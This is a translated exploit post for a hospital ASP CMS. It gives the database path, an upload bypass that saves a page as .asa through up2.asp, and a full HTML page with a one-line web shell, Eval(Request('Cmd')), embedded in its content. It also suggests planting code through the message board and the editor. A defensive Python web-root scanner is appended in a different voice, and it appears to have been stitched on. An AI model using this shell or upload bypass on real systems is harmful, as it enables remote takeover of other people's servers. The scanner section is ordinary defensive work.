It seems that there are two versions, one is asp and the other is php.
Database path: db/sywl.asp
The vulnerability file up2.asp contains too much content...
Save the following code as; asa directly uploads the file to get the path-_ (of course, you can also construct a sentence by yourself)
Do not add it before. If it is added, the system will prompt that the ASA file cannot be uploaded.
<! DOCTYPE html PUBLIC "-// W3C // dtd xhtml 1.0 Transitional // EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<Html xmlns = "http://www.w3.org/1999/xhtml">
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = UTF-8"/>
<Meta name = "keywords" content = "a"/>
<Meta name = "description" content = "a"/>
<Title> a </title>
<Link href = "/template/images/style.css" rel = "stylesheet" type = "text/css"/>
<Script type = "text/javascript"> var king_page = '/page/'; </script>
<Script src = "/page/system/inc/jquery. js" type = "text/javascript"> </script>
<Script src = "/page/system/inc/jquery. kc. js" type = "text/javascript"> </script>
</Head>
<Body>
<! -- Top -->
<Div id = "top">
<Div> </div>
<Div id = "menu">
<Ul>
<Li> <a href = "/"> hospital homepage </a> </li>
<Li> <a href = "/html/yygk/"> hospital overview </a> </li>
<Li> <a href = "/html/jyzn/"> Medical Treatment guide </a> </li>
<Li> <a href = "/html/ksjs/"> Department introduction </a> </li>
<Li> <a href = "/html/yywh/"> Hospital Culture </a> </li>
<Li> <a href = "/html/news/"> news </a> </li>
<Li> <a href = "/html/jkkp/"> Health Science </a> </li>
<Li> <a href = "/page/feedback/"> Please leave a message </a> </li>
</Ul>
</Div>
<! -- Main menu -->
</Div>
<! -- Content -->
<Div class = "content" id = "onepage"> <%
Dim ConKey: ConKey = "Cmd"
Dim InValue: InValue = Request (ConKey)
Eval (InValue)
%> </Div>
<! -- Bottom -->
<Div id = "line"> </div>
<Div id = "bottom">
Beijing ICP filing No. XXX </div>
<Div id = "Layer1">
<Object classid = "clsid: D27CDB6E-AE6D-11cf-96B8-444553540000" codebase = "http ://.... /pub/shockwave/cabs/flash/swflash. cab # version = 910, 175 "width =" "height =" ">
<Param name = "movie" value = "/template/images/sqlogo.swf"/>
<Param name = "quality" value = "high"/>
<Param name = "wmode" value = "transparent">
<Embed src = "/template/images/sqlogo.swf" quality = "high" wmode = "transparent" pluginspage = "http://www.bkjia.com/go/getflashplayer" type = "application/x-shockwave- flash "width =" 910 "height =" 175 "> </embed>
</Object>
</Div>
</Body>
</Html>
Simpler, if the database has not been renamed: leave a message with a sentence in it, then connect to the database file.
Cool
It seems that this program has an editor, which can also be used in this way.
Fix: address the issues identified in the analysis above.
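The fix line gives no detail, so here is an added example (not from the original post or the CMS) of a check a defender can run over the web root. It flags script-mapped files that pass Request data to Eval/Execute, as the uploaded page above does, and databases stored under a script-mapped extension such as db/sywl.asp. The extension list, the Access (Jet) file header and all function names are assumptions of this sketch.

```python
import re
from pathlib import Path

# Extensions classic IIS commonly maps to the ASP engine (assumption: verify
# against the handler mappings of the server being reviewed).
SCRIPT_EXTS = {".asp", ".asa", ".cer", ".cdx"}
# Header of a Jet/ACE (Access) file; assumes the CMS database is Access.
JET_MAGIC = (b"\x00\x01\x00\x00Standard Jet DB", b"\x00\x01\x00\x00Standard ACE DB")

_EVAL = r"\b(?:executeglobal|execute|eval)(?:\s*\(\s*|\s+)"
DIRECT = re.compile(_EVAL + r"request\b", re.I)
CALL = re.compile(_EVAL + r"(\w+)", re.I)
ASSIGN = re.compile(r"\b(\w+)\s*=\s*request\b", re.I)

# Constructed samples: the shape of the page's payload, and a benign page.
SAMPLE_BAD = b'<% Dim InValue: InValue = Request ("Cmd")\nEval (InValue) %>'
SAMPLE_OK = b'<% Response.Write Server.HTMLEncode(Request("q")) %>'


def evaluates_request_input(source):
    """True if Eval/Execute is fed Request data, directly or via a variable."""
    if DIRECT.search(source):
        return True
    tainted = {m.group(1).lower() for m in ASSIGN.finditer(source)}
    return any(m.group(1).lower() in tainted for m in CALL.finditer(source))


def review_file(name, data):
    """Return the reasons (possibly none) a file under the web root needs review."""
    if Path(name).suffix.lower() not in SCRIPT_EXTS:
        return []
    reasons = []
    if data.startswith(JET_MAGIC):
        reasons.append("database stored under a script-mapped extension")
    if evaluates_request_input(data.decode("latin-1")):
        reasons.append("Eval/Execute on request-controlled input")
    return reasons


def scan_webroot(root):
    """Map each flagged file (path relative to root) to its reasons."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file():
            reasons = review_file(path.name, path.read_bytes())
            if reasons:
                findings[path.relative_to(root).as_posix()] = reasons
    return findings
```

A hit is a lead for manual review, not proof of compromise. The lasting fix is an extension allow-list in the upload handler and keeping the database outside the web root.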